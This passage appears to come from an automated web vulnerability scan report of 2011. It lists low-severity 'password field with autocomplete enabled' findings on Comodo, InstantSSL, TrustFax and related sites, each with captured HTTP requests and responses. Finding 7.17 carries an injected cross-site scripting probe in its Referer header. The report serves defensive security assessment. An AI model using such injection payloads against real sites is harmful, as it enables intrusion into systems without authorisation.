Cookie: countryName=; loginName=324234234; optimizelyEndUserId=oeu1316362675388r0.6238376419059932; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; __utma=1.620635661.1316362711.1316362711.1316362711.1; __utmc=1; __utmz=1.1316362711.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmx=212060173.; __utmxx=212060173.; optimizelyBuckets=%7B%7D; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmb=212060173.5.10.1316362681; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; ap=; referrerURL=https%3A//www.hackerguardian.com/sas/login.jsp%3Flogin_error%3D1; entryURL=https%3A//hackerguardian.com/hackerguardian/learn/free_vuln_scan.html; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:55:37 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 76758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.opti
...[SNIP]...
</script>

<form onsubmit="return wrapvalidate(validate());" name="evssl" id="evssl" method="post" action="https://secure.comodo.com/products/!PlaceOrder" onSubmit="javascript:__utmLinkPost('/G/securepurchase/HG-addsupport_sslpurchase/proceedtocheckout_btn')">
<script type="text/javascript" >
...[SNIP]...
<td align="left" valign="top">
<input name="loginPassword" type="password" id="loginPassword" value="" size="45"> 
<!--<a onClick="javascript:popUp('password-rules.html')" style="cursor:pointer " name="Rules for Password Complexity">
...[SNIP]...
<td align="left" valign="top">
<input name="verifyPassword" type="password" id="verifyPassword" value="" size="45"></td>
...[SNIP]...

7.10. https://my.psoft.net/my-hsphere/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://my.psoft.net
Path:	/my-hsphere/

Issue detail

The page contains a form with the following action URL:

https://my.psoft.net/my-hsphere/login.php

The form contains the following password field with autocomplete enabled:

login_password

Request

GET /my-hsphere/ HTTP/1.1
Host: my.psoft.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:31:50 GMT
Server: Apache/1.3.39 (Unix) PHP/4.4.7 mod_throttle/3.1.2 mod_psoft_traffic/0.2 mod_ssl/2.8.29 OpenSSL/0.9.7a
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 4537

<html>
<head>
<title>Welcome - My H-Sphere</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="icon" href="/images/favicon.png" type="image/png">
<LINK hre
...[SNIP]...
<table border=0 cellspacing=3 cellpadding=0>
<form action="login.php" method="POST">
<tr>
...[SNIP]...
<td><input type="password" name="login_password" size="10" style="width: 100px"></td>
...[SNIP]...

7.11. https://secure.comodo.com/home/purchase.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.comodo.com
Path:	/home/purchase.php

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.com/home/order.php

The form contains the following password fields with autocomplete enabled:

password
verify_password
ab8d81f3c06b6c3f3c62ddfb12285f8f026ff0618

Request

GET /home/purchase.php?pid=9&utm_source=pfw_fd&utm_medium=buy_free_download&af=1144&utm_campaign=PF_CIS_BUY_FD HTTP/1.1
Host: secure.comodo.com
Connection: keep-alive
Referer: http://personalfirewall.comodo.com/free-download.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1315419552319r0.6822604623157531; kvcd=1316328651224; km_ai=nxNThomVDaBwwqN7xx0NPXpwd58%3D; km_vs=1; km_lv=1316328651; km_uq=; optimizelyCustomEvents=%7B%228018129%22%3A%5B%22Need%20a%20pc%20expert%20try%20it%20now%20button%22%5D%7D; optimizelyBuckets=%7B%228015120%22%3A8013305%2C%228022314%22%3A8017411%7D; __utma=1.355449779.1315419555.1315419555.1315419555.1; __utmb=1.4.10.1316328649; __utmc=1; __utmz=1.1315419555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|utmctr=comodo

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 01:50:26 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 42824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="//cdn.opti
...[SNIP]...
</h1>


                       <form name="select-product" method="post" action="order.php">
                               <div class="top-error">
...[SNIP]...
<td colspan="2"><input type="password" id="password" name="password" value="" /></td>
...[SNIP]...
<td colspan="2"><input type="password" id="verify_password" name="verify_password" value="" /></td>
...[SNIP]...
<input type="hidden" id="cc_cvv" name="cc_cvv" value="ab8d81f3c06b6c3f3c62ddfb12285f8f026ff0618" />
                               <input type="password" maxlength="4" id="ab8d81f3c06b6c3f3c62ddfb12285f8f026ff0618" name="ab8d81f3c06b6c3f3c62ddfb12285f8f026ff0618" class="small" />
                           </td>
...[SNIP]...

7.12. https://secure.comodo.com/products/frontpage previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.comodo.com
Path:	/products/frontpage

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.com/products/login

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /products/frontpage HTTP/1.1
Host: secure.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:30:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 9504

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>COMODO Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#999999 te
...[SNIP]...
<table width=100% border=0 cellspacing=0 cellpadding=2 bgcolor=#E8E8E8>
<form method=post action=/products/login>
<input type=hidden name=SID value=GCRgqIREIML2YPW0>
...[SNIP]...
<br><input type=password name=loginPassword maxlength=128 size=15 value="" class=input2>
</td>
...[SNIP]...

7.13. https://secure.comodo.net/home/purchase.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.comodo.net
Path:	/home/purchase.php

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.net/home/order.php

The form contains the following password fields with autocomplete enabled:

password
verify_password
a5f32a746cac8286cd87ce2033e708b8fb30be314

Request

GET /home/purchase.php HTTP/1.1
Host: secure.comodo.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:30:50 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 43298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="//cdn.opti
...[SNIP]...
</h1>


                       <form name="select-product" method="post" action="order.php">
                               <div class="top-error">
...[SNIP]...
<td colspan="2"><input type="password" id="password" name="password" value="" /></td>
...[SNIP]...
<td colspan="2"><input type="password" id="verify_password" name="verify_password" value="" /></td>
...[SNIP]...
<input type="hidden" id="cc_cvv" name="cc_cvv" value="a5f32a746cac8286cd87ce2033e708b8fb30be314" />
                               <input type="password" maxlength="4" id="a5f32a746cac8286cd87ce2033e708b8fb30be314" name="a5f32a746cac8286cd87ce2033e708b8fb30be314" class="small" />
                           </td>
...[SNIP]...

7.14. https://secure.comodo.net/products/frontpage previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.comodo.net
Path:	/products/frontpage

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.net/products/login

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /products/frontpage HTTP/1.1
Host: secure.comodo.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:30:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 9504

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>COMODO Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#999999 te
...[SNIP]...
<table width=100% border=0 cellspacing=0 cellpadding=2 bgcolor=#E8E8E8>
<form method=post action=/products/login>
<input type=hidden name=SID value=VwsLakBNQ5O17KAF>
...[SNIP]...
<br><input type=password name=loginPassword maxlength=128 size=15 value="" class=input2>
</td>
...[SNIP]...

7.15. https://secure.instantssl.com/products/SSLIdASignup1a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.instantssl.com
Path:	/products/SSLIdASignup1a

Issue detail

The page contains a form with the following action URL:

https://secure.instantssl.com/products/login

The form contains the following password field with autocomplete enabled:

loginPassword

Request

POST /products/SSLIdASignup1a HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Referer: https://secure.instantssl.com/products/frontpage?area=SSL&product=342&days=90&ap=InstantSSL
Content-Length: 85
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

SID=NtcydAl8wNmXs5S2&product=342&days=90&loginName=&loginPassword=&loginErrorMessage=

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:12:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 18028

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>InstantSSL Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#99999
...[SNIP]...
<table width=100% border=0 cellspacing=0 cellpadding=2 bgcolor=#E8E8E8>
<form method=post action=/products/login>
<input type=hidden name=SID value=NtcydAl8wNmXs5S2>
...[SNIP]...
<br><input type=password name=loginPassword maxlength=128 size=15 value="" class=input2>
</td>
...[SNIP]...

7.16. https://secure.instantssl.com/products/frontpage previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.instantssl.com
Path:	/products/frontpage

Issue detail

The page contains a form with the following action URL:

https://secure.instantssl.com/products/login

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /products/frontpage HTTP/1.1
Host: secure.instantssl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:30:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 9504

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>COMODO Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#999999 te
...[SNIP]...
<table width=100% border=0 cellspacing=0 cellpadding=2 bgcolor=#E8E8E8>
<form method=post action=/products/login>
<input type=hidden name=SID value=68LCY39SkyhcQJ5g>
...[SNIP]...
<br><input type=password name=loginPassword maxlength=128 size=15 value="" class=input2>
</td>
...[SNIP]...

7.17. https://secure.trustfax.com/doccorpweb/tf/tf_signup.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.trustfax.com
Path:	/doccorpweb/tf/tf_signup.jsp

Issue detail

The page contains a form with the following action URL:

https://secure.trustfax.com/doccorpweb/tf/tf_signup.jsp?pc=TF011909A

The form contains the following password fields with autocomplete enabled:

choosePassword
confirmChoosePassword

Request

GET /doccorpweb/tf/tf_signup.jsp?pc=TF011909A HTTP/1.1
Host: secure.trustfax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.trustfax.com/pricing.htmlaf10d--%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E0bedec460c4
Cookie: mbox=check#true#1316364867|session#1316364807021-280353#1316366668|PC#1316364807021-280353.19#1318179210; s_cc=true; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_ev4=%5B%5B%27www.fakereferrerdominator.com%27%2C%271316364810621%27%5D%5D; s_ev5=%5B%5B%27Referrers%27%2C%271316364810623%27%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=110010688.913254444.1316364811.1316364811.1316364811.1; __utmb=110010688.1.10.1316364811; __utmc=110010688; __utmz=110010688.1316364811.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=iso-8859-1
Date: Sun, 18 Sep 2011 11:53:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...
<div id="signup-form-form">
<form action="" method="post" id="formSignup" name="formSignup">
<input type="hidden" value="" name="track" />
...[SNIP]...
<div class="formInput">
<input type="password" onblur="validateMe('choosePassword');" value="" maxlength="25" size="30" id="choosePassword" name="choosePassword"/>
</div>
...[SNIP]...
<div class="formInput">
<input type="password" onblur="validateMe('confirmChoosePassword');" value="" maxlength="25" size="30" name="confirmChoosePassword" id="confirmChoosePassword"/>
</div>
...[SNIP]...

7.18. https://secure.trustfax.com/doccorpweb/tf/tf_signup.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.trustfax.com
Path:	/doccorpweb/tf/tf_signup.jsp

Issue detail

The page contains a form with the following action URL:

https://secure.trustfax.com/doccorpweb/tf/tf_signup.jsp

The form contains the following password fields with autocomplete enabled:

choosePassword
confirmChoosePassword

Request

GET /doccorpweb/tf/tf_signup.jsp HTTP/1.1
Host: secure.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=iso-8859-1
Date: Sun, 18 Sep 2011 12:30:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...
<div id="signup-form-form">
<form action="" method="post" id="formSignup" name="formSignup">
<input type="hidden" value="" name="track" />
...[SNIP]...
<div class="formInput">
<input type="password" onblur="validateMe('choosePassword');" value="" maxlength="25" size="30" id="choosePassword" name="choosePassword"/>
</div>
...[SNIP]...
<div class="formInput">
<input type="password" onblur="validateMe('confirmChoosePassword');" value="" maxlength="25" size="30" name="confirmChoosePassword" id="confirmChoosePassword"/>
</div>
...[SNIP]...

7.19. https://support.comodo.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://support.comodo.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://support.comodo.com/index.php

The form contains the following password field with autocomplete enabled:

loginpassword

Request

GET / HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1315419552319r0.6822604623157531; km_ai=nxNThomVDaBwwqN7xx0NPXpwd58%3D; km_lv=1316328762; km_uq=; SWIFT_sessionid40=c08dif8qb3omwic279ulzlf7nqhuloi5; optimizelyCustomEvents=%7B%228018129%22%3A%5B%22Need%20a%20pc%20expert%20try%20it%20now%20button%22%2C%22Top%20Buy%20Now%22%2C%22SSL%20Security%20(emerchant%20solutions)%22%2C%22banner%22%2C%22top%20menu%22%5D%7D; optimizelyBuckets=%7B%228015120%22%3A8013305%2C%228022314%22%3A8017411%7D; __utma=1.355449779.1315419555.1315419555.1316362394.2; __utmb=1.17.10.1316362394; __utmc=1; __utmz=1.1315419555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|utmctr=comodo

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:27:01 GMT
Server: Apache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31729

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Comodo - Kayako SupportSuite Help Desk Software</title>
<meta http-equiv=
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="https://support.comodo.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" class="loginpassword" value=""></td>
...[SNIP]...

7.20. https://support.comodo.com/index.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://support.comodo.com
Path:	/index.php

Issue detail

The page contains a form with the following action URL:

https://support.comodo.com/index.php

The form contains the following password field with autocomplete enabled:

loginpassword

Request

GET /index.php?_m=knowledgebase&_a=view&parentcategoryid=33 HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
Referer: https://secure.instantssl.com/products/SSLIdASignup1a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1315419552319r0.6822604623157531; km_ai=nxNThomVDaBwwqN7xx0NPXpwd58%3D; km_lv=1316328762; km_uq=; optimizelyCustomEvents=%7B%228018129%22%3A%5B%22Need%20a%20pc%20expert%20try%20it%20now%20button%22%2C%22Top%20Buy%20Now%22%2C%22SSL%20Security%20(emerchant%20solutions)%22%5D%7D; optimizelyBuckets=%7B%228015120%22%3A8013305%2C%228022314%22%3A8017411%7D; __utma=1.355449779.1315419555.1315419555.1316362394.2; __utmb=1.3.10.1316362394; __utmc=1; __utmz=1.1315419555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|utmctr=comodo

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:15:01 GMT
Server: Apache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 55422

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Comodo - Kayako SupportSuite Help Desk Software</title>
<meta http-equiv=
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="https://support.comodo.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" class="loginpassword" value=""></td>
...[SNIP]...

7.21. http://www.comodo.com/login/comodo-members.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.comodo.com
Path:	/login/comodo-members.php

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /login/comodo-members.php HTTP/1.1
Host: www.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:30:30 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 5627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="//www.w3.org/1999/xhtml">
<head>
<script src="//cdn.optimizely.
...[SNIP]...
</h3>
<form name="loginForm" action="https://secure.comodo.com/products/!hostedLogin" method="post" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)" >
<p>
...[SNIP]...
</p>
<input type="password" name="loginPassword" id="loginPassword" class="formlog" /> <input type="image" src="../images/log-on.jpg" name="submit" alt="Log on" title="Log on" class="formlogbut" />
...[SNIP]...

7.22. https://www.comodo.com/login/comodo-members.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.comodo.com
Path:	/login/comodo-members.php

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /login/comodo-members.php HTTP/1.1
Host: www.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:40 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 5627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="//www.w3.org/1999/xhtml">
<head>
<script src="//cdn.optimizely.
...[SNIP]...
</h3>
<form name="loginForm" action="https://secure.comodo.com/products/!hostedLogin" method="post" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)" >
<p>
...[SNIP]...
</p>
<input type="password" name="loginPassword" id="loginPassword" class="formlog" /> <input type="image" src="../images/log-on.jpg" name="submit" alt="Log on" title="Log on" class="formlogbut" />
...[SNIP]...

7.23. http://www.comodopartners.com/partner/evssl.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.comodopartners.com
Path:	/partner/evssl.html

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /partner/evssl.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:18 GMT
Content-Type: text/html
Content-Length: 8506
Last-Modified: Tue, 12 Oct 2010 00:39:57 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ">
<form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
<input value="US" name="country" type="hidden" >
...[SNIP]...
<td align="left" valign="top"><input type="password" name="loginPassword" value="" style="width:122px" ><a href="javascript: if(document.loginForm.onsubmit()){document.loginForm.submit();};secure_login_close()">
...[SNIP]...

7.24. http://www.comodopartners.com/partner/partnerdoc.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.comodopartners.com
Path:	/partner/partnerdoc.html

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /partner/partnerdoc.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:16 GMT
Content-Type: text/html
Content-Length: 17656
Last-Modified: Tue, 01 Feb 2011 23:59:28 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ">
<form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
<input value="US" name="country" type="hidden" >
...[SNIP]...
<td align="left" valign="top"><input type="password" name="loginPassword" value="" style="width:122px" ><a href="javascript: if(document.loginForm.onsubmit()){document.loginForm.submit();};secure_login_close()">
...[SNIP]...

7.25. http://www.comodopartners.com/partner/rootkey.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.comodopartners.com
Path:	/partner/rootkey.html

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /partner/rootkey.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:17 GMT
Content-Type: text/html
Content-Length: 9626
Last-Modified: Tue, 12 Oct 2010 00:39:57 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ;">
<form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
<input value="US" name="country" type="hidden" >
...[SNIP]...
<td align="left" valign="top"><input type="password" name="loginPassword" value="" style="width:122px" ><a href="javascript: if(document.loginForm.onsubmit()){document.loginForm.submit();};secure_login_close()">
...[SNIP]...

7.26. http://www.comodopartners.com/partner/trustlogo.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.comodopartners.com
Path:	/partner/trustlogo.html

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /partner/trustlogo.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:17 GMT
Content-Type: text/html
Content-Length: 8498
Last-Modified: Tue, 12 Oct 2010 00:39:57 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
